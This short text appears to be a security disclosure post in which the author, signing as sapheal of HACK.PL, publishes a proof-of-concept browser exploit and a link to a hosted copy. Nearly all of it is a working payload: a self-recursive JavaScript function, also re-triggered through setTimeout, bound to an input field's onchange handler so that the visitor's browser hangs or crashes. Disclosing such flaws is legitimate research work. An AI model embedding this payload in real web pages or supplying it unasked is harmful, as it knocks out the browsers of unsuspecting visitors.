PoC exploit: <script> function owned(){ setTimeout("owned()",1000); owned(); } </script> <input type="foo" size="30" id="bar" onchange="owned()"> It is available under the following address: http://sapheal.cybersecurity.pl/blackbook/simple/ddarko_ABCDE.html Kind regards, Michal Bucko (sapheal) HACK.PL